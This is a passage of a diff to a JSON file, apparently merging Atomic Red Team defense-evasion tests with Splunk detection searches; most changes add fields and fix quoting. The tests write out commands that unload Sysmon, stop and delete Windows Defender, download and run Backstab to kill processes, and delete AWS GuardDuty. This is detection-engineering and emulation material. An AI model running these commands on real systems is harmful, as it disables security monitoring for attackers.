\"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\" -Force\n" }, { "description": "sysmon must be Installed\n", "prereq_command": "if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }\n", - "get_prereq_command": "if(cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") { C:\\Windows\\Sysmon.exe -accepteula -i } else\n{ Set-Location PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\; .\\Sysmon.exe -accepteula -i}\n" + "get_prereq_command": "if(cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") { C:\\Windows\\Sysmon.exe -accepteula -i } else\n{ & \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\" -accepteula -i}\n" }, { "description": "sysmon filter must be loaded\n", "prereq_command": "if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }\n", - "get_prereq_command": "sysmon -u\nsysmon -accepteula -i\n" + "get_prereq_command": "if(Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\"){\n & \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\" -u\n & \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\" -accepteula -i\n}else{\n sysmon -u\n sysmon -accepteula -i\n}\n" } ], "executor": { "command": "fltmc.exe unload #{sysmon_driver}\n", - "cleanup_command": "sysmon -u -i > nul 2>&1\nsysmon -i -accepteula -i > nul 2>&1\n%temp%\\Sysmon\\sysmon.exe -u > nul 2>&1\n%temp%\\Sysmon\\sysmon.exe -accepteula -i > nul 2>&1\n", + "cleanup_command": "sysmon -u -i > nul 2>&1\nsysmon -i -accepteula -i > nul 2>&1\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\" -u > nul 2>&1\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\" -accepteula -i > nul 2>&1\n", "name": "command_prompt", "elevation_required": true } @@ -501592,13 +507139,13 @@ "dependencies": [ { "description": "Advancedrun.exe must exist at #{AdvancedRun_Location}\n", - "prereq_command": "if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}\n", + "prereq_command": "if(Test-Path -Path \"#{AdvancedRun_Location}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"http://www.nirsoft.net/utils/advancedrun.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\advancedrun.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\advancedrun.zip\" -destinationpath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -Force\n" } ], "executor": { - "command": "Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", - "cleanup_command": "Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"start WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n", + "command": "Try {cmd /c \"#{AdvancedRun_Location}\" /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c \"#{AdvancedRun_Location}\" /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "cleanup_command": "Try {cmd /c \"#{AdvancedRun_Location}\" /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"start WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n", "name": "powershell", "elevation_required": true } @@ -501621,12 +507168,12 @@ "dependencies": [ { "description": "Backstab64.exe should exist in ExtrnalPayloads Directory", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\Backstab64.exe) {exit 0} else {exit 1}", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Backstab64.exe\") {exit 0} else {exit 1}", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Backstab64.exe\"\n" } ], "executor": { - "command": "& PathToAtomicsFolder\\..\\ExternalPayloads\\Backstab64.exe -k -n #{process_name}", + "command": "& \"PathToAtomicsFolder\\..\\ExternalPayloads\\Backstab64.exe\" -k -n #{process_name}\n", "name": "powershell", "elevation_required": true } @@ -501863,6 +507410,35 @@ "name": "command_prompt", "elevation_required": true } + }, + { + "name": "AWS - GuardDuty Suspension or Deletion", + "auto_generated_guid": "11e65d8d-e7e4-470e-a3ff-82bc56ad938e", + "description": "Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "region": { + "description": "Name of the specified region", + "type": "string", + "default": "us-east-1" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Check if ~/.aws/credentials file has a default stanza is configured\n", + "prereq_command": "cat ~/.aws/credentials | grep \"default\"\n", + "get_prereq_command": "echo \"Please install the aws-cli and configure your AWS default profile using: aws configure\"\n" + } + ], + "executor": { + "command": "detectorId=$(aws guardduty create-detector --enable --region \"#{region}\" | grep -oP '(?<=\"DetectorId\": \")[^\"]*')\naws guardduty update-detector --no-enable --detector-id $detectorId\naws guardduty delete-detector --detector-id $detectorId\n", + "cleanup_command": "echo \"If test successfully ran, no cleanup required.\"\n", + "name": "bash", + "elevation_required": false + } } ] } @@ -502519,7 +508095,7 @@ { "name": "Attempt To Stop Security Service", "description": "This search looks for attempts to stop security-related services on the endpoint.", - "search": "| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = sc.exe Processes.process=\"* stop *\" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`", + "search": "| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = sc.exe Processes.process=\"* stop *\" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`", "tags": { "name": "Attempt To Stop Security Service", "analytic_story": [ @@ -502622,7 +508198,7 @@ { "name": "Disable AMSI Through Registry", "description": "this search is to identify modification in registry to disable AMSI windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_amsi_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_amsi_through_registry_filter`", "tags": { "name": "Disable AMSI Through Registry", "analytic_story": [ @@ -502636,7 +508212,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Disable AMSI Through Registry", + "message": "Disable AMSI Through Registry on $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -502700,7 +508276,7 @@ { "name": "Disable Defender AntiVirus Registry", "description": "This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender*\" Registry.registry_value_name IN (\"DisableAntiSpyware\",\"DisableAntiVirus\") Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender*\" Registry.registry_value_name IN (\"DisableAntiSpyware\",\"DisableAntiVirus\") Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter`", "tags": { "name": "Disable Defender AntiVirus Registry", "analytic_story": [ @@ -502714,7 +508290,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -502785,7 +508361,7 @@ { "name": "Disable Defender BlockAtFirstSeen Feature", "description": "This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = DisableBlockAtFirstSeen Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_blockatfirstseen_feature_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = DisableBlockAtFirstSeen Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_blockatfirstseen_feature_filter`", "tags": { "name": "Disable Defender BlockAtFirstSeen Feature", "analytic_story": [ @@ -502957,7 +508533,7 @@ { "name": "Disable Defender MpEngine Registry", "description": "This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine*\" Registry.registry_value_name = MpEnablePus Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_mpengine_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine*\" Registry.registry_value_name = MpEnablePus Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_mpengine_registry_filter`", "tags": { "name": "Disable Defender MpEngine Registry", "analytic_story": [ @@ -502971,7 +508547,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -503042,7 +508618,7 @@ { "name": "Disable Defender Spynet Reporting", "description": "This analytic is intended to detect a suspicious modification of registry to disable Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV product, specifically the spynet reporting for Defender telemetry.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SpynetReporting Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_spynet_reporting_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SpynetReporting Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_spynet_reporting_filter`", "tags": { "name": "Disable Defender Spynet Reporting", "analytic_story": [ @@ -503129,7 +508705,7 @@ { "name": "Disable Defender Submit Samples Consent Feature", "description": "This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SubmitSamplesConsent Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_submit_samples_consent_feature_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SubmitSamplesConsent Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_submit_samples_consent_feature_filter`", "tags": { "name": "Disable Defender Submit Samples Consent Feature", "analytic_story": [ @@ -503144,7 +508720,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -503214,8 +508790,8 @@ }, { "name": "Disable ETW Through Registry", - "description": "this search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_etw_through_registry_filter`", + "description": "This search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_etw_through_registry_filter`", "tags": { "name": "Disable ETW Through Registry", "analytic_story": [ @@ -503229,7 +508805,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Disable ETW Through Registry", + "message": "Disable ETW Through Registry on $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -503293,7 +508869,7 @@ { "name": "Disable Registry Tool", "description": "This search identifies modification of registry to disable the regedit or registry tools of the windows operating system. Since registry tool is a swiss knife in analyzing registry, malware such as RAT or trojan Spy disable this application to prevent the removal of their registry entry such as persistence, file less components and defense evasion.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`", "tags": { "name": "Disable Registry Tool", "analytic_story": [ @@ -503479,7 +509055,7 @@ { "name": "Disable Show Hidden Files", "description": "The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", "tags": { "name": "Disable Show Hidden Files", "analytic_story": [ @@ -503616,7 +509192,7 @@ { "name": "Disable Windows App Hotkeys", "description": "This analytic detects a suspicious registry modification to disable Windows hotkey (shortcut keys) for native Windows applications. This technique is commonly used to disable certain or several Windows applications like `taskmgr.exe` and `cmd.exe`. This technique is used to impair the analyst in analyzing and removing the attacker implant in compromised systems.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\" AND Registry.registry_value_data= \"HotKey Disabled\" AND Registry.registry_value_name = \"Debugger\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\" AND Registry.registry_value_data= \"HotKey Disabled\" AND Registry.registry_value_name = \"Debugger\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`", "tags": { "name": "Disable Windows App Hotkeys", "analytic_story": [ @@ -503724,7 +509300,7 @@ { "name": "Disable Windows Behavior Monitoring", "description": "This search is to identifies a modification in registry to disable the windows denfender real time behavior monitoring. This event or technique is commonly seen in RAT, bot, or Trojan to disable AV to evade detections.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableOnAccessProtection\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIOAVProtection\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableScriptScanning\" AND Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_behavior_monitoring_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableOnAccessProtection\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIOAVProtection\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableScriptScanning\" AND Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_behavior_monitoring_filter`", "tags": { "name": "Disable Windows Behavior Monitoring", "analytic_story": [ @@ -503806,7 +509382,7 @@ { "name": "Disable Windows SmartScreen Protection", "description": "The following search identifies a modification of registry to disable the smartscreen protection of windows machine. This is windows feature provide an early warning system against website that might engage in phishing attack or malware distribution. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\SmartScreenEnabled\" Registry.registry_value_data= \"Off\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_smartscreen_protection_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\SmartScreenEnabled\" Registry.registry_value_data= \"Off\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_smartscreen_protection_filter`", "tags": { "name": "Disable Windows SmartScreen Protection", "analytic_story": [ @@ -503890,8 +509466,8 @@ }, { "name": "Disabling CMD Application", - "description": "this search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`", + "description": "This search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= 